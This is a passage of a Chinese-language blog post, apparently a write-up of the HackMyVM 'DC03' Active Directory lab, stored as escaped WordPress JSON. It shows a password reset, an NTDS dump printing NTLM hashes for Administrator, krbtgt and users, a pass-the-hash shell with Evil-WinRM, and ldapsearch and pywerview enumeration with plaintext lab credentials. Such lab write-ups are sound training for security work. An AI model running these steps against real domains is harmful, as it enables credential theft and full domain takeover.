setuserinfo2\u662frpcclient\u4e2d\u7684\u4e00\u4e2a\u547d\u4ee4\uff0c\u7528\u4e8e\u4fee\u6539\u7528\u6237\u8d26\u6237\u7684\u4fe1\u606f\n# 23\uff1a\u8868\u793a\u8981\u4fee\u6539\u7684\u5c5e\u6027\u7c7b\u578b\uff08RID\uff0c\u5373\u5b89\u5168\u6807\u8bc6\u7b26\u7684\u540e\u7f00\uff09\u3002\u5728 Windows \u4e2d\uff0c23 \u5bf9\u5e94\u7528\u6237\u5bc6\u7801\u5c5e\u6027\u3002\nrpcclient $&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ netexec smb $IP -u fbeth103 -p hgbe02pass\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [+] SOUPEDECODE.LOCAL\\fbeth103:hgbe02pass (Pwn3d!)<\/code><\/pre>\n<h3>\u8f6c\u50a8 NTDS\u83b7\u53d6NTLM\u767b\u5f55<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ netexec smb $IP -u fbeth103 -p hgbe02pass --ntds\n[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user &lt;user&gt; to dump a specific user safely or the module -M ntdsutil [Y\/n] Y\nSMB         192.168.10.101  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.101  445    DC01             [+] SOUPEDECODE.LOCAL\\fbeth103:hgbe02pass (Pwn3d!)\nSMB         192.168.10.101  445    DC01             [-] RemoteOperations failed: SMB SessionError: code: 0xc00000ac - STATUS_PIPE_NOT_AVAILABLE - An instance of a named pipe cannot be found in the listening state.\nSMB         192.168.10.101  445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...\nSMB         192.168.10.101  445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:2176416a80e4f62804f101d3a55d6c93:::\nSMB         192.168.10.101  445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nSMB         192.168.10.101  445    DC01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\eyara3:1106:aad3b435b51404eeaad3b435b51404ee:68e34c259878fd6a31c85cbea32ac671:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\pquinn4:1107:aad3b435b51404eeaad3b435b51404ee:92cdedd79a2fe7cbc8c55826b0ff2d54:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\jharper5:1108:aad3b435b51404eeaad3b435b51404ee:800f9c9d3e4654d9bd590fc4296adf01:::\nSMB         192.168.10.101  445    DC01             soupedecode.local\\bxenia6:1109:aad3b435b51404eeaad3b435b51404ee:d997d3309bc876f12cbbe932d82b18a3:::\n--------------<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ evil-winrm -i $IP -u Administrator -H 2176416a80e4f62804f101d3a55d6c93\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&#039; for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents&gt; whoami\nsoupedecode\\administrator\n*Evil-WinRM* PS C:\\Users\\Administrator\\Documents&gt; cd ..\/desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\desktop&gt; type root.txt\nb8e59a7d4020792c412da75e589ff4fc<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130463.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506131130463.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613102959983\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u5176\u4ed6\u67e5\u770bAD\u57df\u7ec4\u4fe1\u606f\u7684\u76f8\u5173\u5de5\u5177<\/h2>\n<p>\u4ece\u522b\u7684\u5e08\u5085\u90a3\u5b66\u6765\u4e86\u4e00\u4e9b\u5de5\u5177\uff1a<\/p>\n<h3>\u65b9\u6cd5\u4e00\uff1aldapsearch<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP\/ -D &quot;xkate578@SOUPEDECODE.LOCAL&quot; -w &#039;jesuschrist&#039; -b &quot;dc=SOUPEDECODE,dc=LOCAL&quot; &quot;(sAMAccountName=xkate578)&quot; memberOf\n# extended LDIF\n#\n# LDAPv3\n# base &lt;dc=SOUPEDECODE,dc=LOCAL&gt; with scope subtree\n# filter: (sAMAccountName=xkate578)\n# requesting: memberOf \n#\n\n# Xenia Kate, Users, SOUPEDECODE.LOCAL\ndn: CN=Xenia Kate,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nmemberOf: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL\n\n# search reference\nref: ldap:\/\/ForestDnsZones.SOUPEDECODE.LOCAL\/DC=ForestDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/DomainDnsZones.SOUPEDECODE.LOCAL\/DC=DomainDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/SOUPEDECODE.LOCAL\/CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 5\n# numEntries: 1\n# numReferences: 3\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP\/ -D &quot;xkate578@SOUPEDECODE.LOCAL&quot; -w &#039;jesuschrist&#039; -b &quot;dc=SOUPEDECODE,dc=LOCAL&quot; &quot;(CN=Domain Admins)&quot; memberOf\n# extended LDIF\n#\n# LDAPv3\n# base &lt;dc=SOUPEDECODE,dc=LOCAL&gt; with scope subtree\n# filter: (CN=Domain Admins)\n# requesting: memberOf \n#\n\n# Domain Admins, Users, SOUPEDECODE.LOCAL\ndn: CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nmemberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC\n =LOCAL\nmemberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL\n\n# search reference\nref: ldap:\/\/ForestDnsZones.SOUPEDECODE.LOCAL\/DC=ForestDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/DomainDnsZones.SOUPEDECODE.LOCAL\/DC=DomainDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/SOUPEDECODE.LOCAL\/CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 5\n# numEntries: 1\n# numReferences: 3\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP\/ -D &quot;xkate578@SOUPEDECODE.LOCAL&quot; -w &#039;jesuschrist&#039; -b &quot;dc=SOUPEDECODE,dc=LOCAL&quot; &quot;(CN=Operators)&quot; member | grep &quot;member:&quot;\nmember: CN=Fanny Beth,CN=Users,DC=SOUPEDECODE,DC=LOCAL\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP\/ -D &quot;xkate578@SOUPEDECODE.LOCAL&quot; -w &#039;jesuschrist&#039; -b &quot;dc=SOUPEDECODE,dc=LOCAL&quot; &quot;(CN=Fanny Beth)&quot;\n# extended LDIF\n#\n# LDAPv3\n# base &lt;dc=SOUPEDECODE,dc=LOCAL&gt; with scope subtree\n# filter: (CN=Fanny Beth)\n# requesting: ALL\n#\n\n# Fanny Beth, Users, SOUPEDECODE.LOCAL\ndn: CN=Fanny Beth,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: Fanny Beth\nsn: Beth\nl: Springfield\nst: CA\ntitle: Analyst\ndescription: Classic car restorer and automotive enthusiast\npostalCode: 21570\ntelephoneNumber: 523-6243\ngivenName: Fanny\ninitials: FB\ndistinguishedName: CN=Fanny Beth,CN=Users,DC=SOUPEDECODE,DC=LOCAL\ninstanceType: 4\nwhenCreated: 20240615200441.0Z\nwhenChanged: 20250613173228.0Z\ndisplayName: Fanny Beth\nuSNCreated: 17136\nmemberOf: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nuSNChanged: 40994\ndepartment: Dev\ncompany: CompanyB\nstreetAddress: 789 Pine St\nname: Fanny Beth\nobjectGUID:: B0LxTOr80UOGk0BBvSCLIQ==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 0\nlastLogoff: 0\nlastLogon: 0\nlogonHours:: \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\npwdLastSet: 133943089540709780\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAAerQJsnyUyQIUllWVxQQAAA==\nadminCount: 1\naccountExpires: 0\nlogonCount: 0\nsAMAccountName: fbeth103\nsAMAccountType: 805306368\nuserPrincipalName: fbeth103@soupedecode.local\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\ndSCorePropagationData: 20250613173228.0Z\ndSCorePropagationData: 16010101000000.0Z\nlastLogonTimestamp: 133943089830815646\nmail: fbeth103@soupedecode.local\n\n# search reference\nref: ldap:\/\/ForestDnsZones.SOUPEDECODE.LOCAL\/DC=ForestDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/DomainDnsZones.SOUPEDECODE.LOCAL\/DC=DomainDnsZones,DC=SOUPEDECODE,\n DC=LOCAL\n\n# search reference\nref: ldap:\/\/SOUPEDECODE.LOCAL\/CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 5\n# numEntries: 1\n# numReferences: 3<\/code><\/pre>\n<h3>\u65b9\u6cd5\u4e8c\uff1apywerview<\/h3>\n<blockquote>\n<p>\u5de5\u5177\uff1a<a href=\"https:\/\/github.com\/the-useless-one\/pywerview\">https:\/\/github.com\/the-useless-one\/pywerview<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ python ~\/tools\/pywerview\/pywerview.py get-netuser -w &#039;SOUPEDECODE.LOCAL&#039; -u &#039;xkate578&#039; -p &#039;jesuschrist&#039; --dc-ip $IP --username &#039;xkate578&#039;                                 \nobjectclass:           top, person, organizationalPerson, user\ncn:                    Xenia Kate\nsn:                    Kate\nl:                     Springfield\nst:                    NY\ntitle:                 Analyst\ndescription:           Adventure seeker and extreme sports fan\npostalcode:            81335\ntelephonenumber:       719-5053\ngivenname:             Xenia\ninitials:              XK\ndistinguishedname:     CN=Xenia Kate,CN=Users,DC=SOUPEDECODE,DC=LOCAL\ninstancetype:          4\nwhencreated:           2024-06-15 20:04:39+00:00\nwhenchanged:           2025-06-13 17:19:03+00:00\ndisplayname:           Xenia Kate\nusncreated:            16902\nmemberof:              CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL\nusnchanged:            40978\ndepartment:            Sales\ncompany:               CompanyC\nstreetaddress:         123 Elm St\nname:                  Xenia Kate\nobjectguid:            {f5dee86d-8f4e-4591-8446-0250d6e4bf92}\nuseraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\nbadpwdcount:           0\ncodepage:              0\ncountrycode:           0\nbadpasswordtime:       1601-01-01 00:00:00+00:00\nlastlogoff:            1601-01-01 00:00:00+00:00\nlastlogon:             2024-08-01 06:05:02.099560+00:00\nlogonhours:            ffffffffffffffffffffffffffffffffffffffffff...\npwdlastset:            2024-08-01 05:37:18.874022+00:00\nprimarygroupid:        513\nobjectsid:             S-1-5-21-2986980474-46765180-2505414164-1182\nadmincount:            1\naccountexpires:        1601-01-01 00:00:00+00:00\nlogoncount:            5\nsamaccountname:        xkate578\nsamaccounttype:        USER_OBJECT\nuserprincipalname:     xkate578@soupedecode.local\nobjectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\ndscorepropagationdata: 2024-08-01 05:47:50+00:00, 1601-01-01 00:00:00+00:00\nlastlogontimestamp:    2025-06-13 17:19:03.146719+00:00\nmail:                  xkate578@soupedecode.local\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ python ~\/tools\/pywerview\/pywerview.py get-netgroupmember -w &#039;SOUPEDECODE.LOCAL&#039; -u &#039;xkate578&#039; -p &#039;jesuschrist&#039; --dc-ip $IP --groupname &#039;Domain Admins&#039;\ngroupdomain:        SOUPEDECODE.LOCAL\ngroupname:          Domain Admins\nmembername:         Operators\nmemberdomain:       SOUPEDECODE.LOCAL\nuseraccountcontrol: \nisgroup:            True\nmemberdn:           CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nobjectsid:          S-1-5-21-2986980474-46765180-2505414164-2165\n\ngroupdomain:        SOUPEDECODE.LOCAL\ngroupname:          Domain Admins\nmembername:         Administrator\nmemberdomain:       SOUPEDECODE.LOCAL\nuseraccountcontrol: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\nisgroup:            False\nmemberdn:           CN=Administrator,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nobjectsid:          S-1-5-21-2986980474-46765180-2505414164-500\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ python ~\/tools\/pywerview\/pywerview.py get-netgroupmember -w &#039;SOUPEDECODE.LOCAL&#039; -u &#039;xkate578&#039; -p &#039;jesuschrist&#039; --dc-ip $IP --groupname &#039;Operators&#039;    \ngroupdomain:        SOUPEDECODE.LOCAL\ngroupname:          Operators\nmembername:         fbeth103\nmemberdomain:       SOUPEDECODE.LOCAL\nuseraccountcontrol: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\nisgroup:            False\nmemberdn:           CN=Fanny Beth,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nobjectsid:          S-1-5-21-2986980474-46765180-2505414164-1221\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ python ~\/tools\/pywerview\/pywerview.py get-netuser -w &#039;SOUPEDECODE.LOCAL&#039; -u &#039;xkate578&#039; -p &#039;jesuschrist&#039; --dc-ip $IP --username &#039;fbeth103&#039;         \nobjectclass:           top, person, organizationalPerson, user\ncn:                    Fanny Beth\nsn:                    Beth\nl:                     Springfield\nst:                    CA\ntitle:                 Analyst\ndescription:           Classic car restorer and automotive enthusiast\npostalcode:            21570\ntelephonenumber:       523-6243\ngivenname:             Fanny\ninitials:              FB\ndistinguishedname:     CN=Fanny Beth,CN=Users,DC=SOUPEDECODE,DC=LOCAL\ninstancetype:          4\nwhencreated:           2024-06-15 20:04:41+00:00\nwhenchanged:           2025-06-13 17:32:28+00:00\ndisplayname:           Fanny Beth\nusncreated:            17136\nmemberof:              CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL\nusnchanged:            40994\ndepartment:            Dev\ncompany:               CompanyB\nstreetaddress:         789 Pine St\nname:                  Fanny Beth\nobjectguid:            {4cf14207-fcea-43d1-8693-4041bd208b21}\nuseraccountcontrol:    NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\nbadpwdcount:           0\ncodepage:              0\ncountrycode:           0\nbadpasswordtime:       1601-01-01 00:00:00+00:00\nlastlogoff:            1601-01-01 00:00:00+00:00\nlastlogon:             1601-01-01 00:00:00+00:00\nlogonhours:            ffffffffffffffffffffffffffffffffffffffffff...\npwdlastset:            2025-06-13 17:22:34.070978+00:00\nprimarygroupid:        513\nobjectsid:             S-1-5-21-2986980474-46765180-2505414164-1221\nadmincount:            1\naccountexpires:        1601-01-01 00:00:00+00:00\nlogoncount:            0\nsamaccountname:        fbeth103\nsamaccounttype:        USER_OBJECT\nuserprincipalname:     fbeth103@soupedecode.local\nobjectcategory:        CN=Person,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\ndscorepropagationdata: 2025-06-13 17:32:28+00:00, 1601-01-01 00:00:00+00:00\nlastlogontimestamp:    2025-06-13 17:23:03.081564+00:00\nmail:                  fbeth103@soupedecode.local<\/code><\/pre>\n<p>\u90fd\u662f\u5f88\u597d\u7528\u7684\u5de5\u5177\u554a\uff01\uff01\uff01<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/medium.com\/@josemlwdf\/dc03-4deb08dc136f\">https:\/\/medium.com\/@josemlwdf\/dc03-4deb08dc136f<\/a><\/p>\n<p><a href=\"https:\/\/alientec1908.github.io\/DC03_HackMyVM_Medium\/\">https:\/\/alientec1908.github.io\/DC03_HackMyVM_Medium\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/BanYio\/HackMyVM\/blob\/main\/DC-03.md\">https:\/\/github.com\/BanYio\/HackMyVM\/blob\/main\/DC-03.md<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/francescolonardo\/writeups\/blob\/main\/hackmyvm_dc03.md\">https:\/\/github.com\/francescolonardo\/writeups\/blob\/main\/hackmyvm_dc03.md<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC03 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-865","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=865"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/865\/revisions"}],"predecessor-version":[{"id":866,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/865\/revisions\/866"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=865"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}